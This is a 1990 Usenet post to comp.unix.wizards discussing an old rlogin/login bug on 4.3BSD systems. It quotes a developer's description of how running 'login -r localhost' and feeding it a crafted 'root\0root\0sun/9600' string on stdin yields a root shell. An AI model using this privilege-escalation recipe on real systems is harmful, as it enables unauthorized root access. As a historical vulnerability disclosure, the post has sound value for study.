Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!samsung!sdd.hp.com!uakari.primate.wisc.edu!aplcen!haven!mimsy!mojo!mojo!djm
From: djm@eng.umd.edu (David J. MacKenzie)
Newsgroups: comp.unix.wizards
Subject: Re: Old rlogin bug
Message-ID: <DJM.90Jul25190101@frob.eng.umd.edu>
Date: 25 Jul 90 23:01:01 GMT
References: <23959@adm.BRL.MIL> <13409@smoke.BRL.MIL>
Sender: news@eng.umd.edu (The News System)
Organization: Free Software Foundation
Lines: 16
In-Reply-To: gwyn@smoke.BRL.MIL's message of 25 Jul 90 19:15:57 GMT

Mike Rowan, who wrote the GNU login (still in test stage) sent me a
note recently that might be relevant here, excerpted below:

On a standard 4.3 login system write a program that does this:
fork() & exec login
write to login's stdin:
locuser\0remuser\0tty/speed\0

So I login to a host and run this like so:
exec "login -r localhost"
and stick this on logins stdin: "root\0root\0sun/9600"

And I get a root shell.  They took this auth code out of login in 4.3T
and make rlogind do it.
--
David J. MacKenzie <djm@eng.umd.edu> <djm@ai.mit.edu>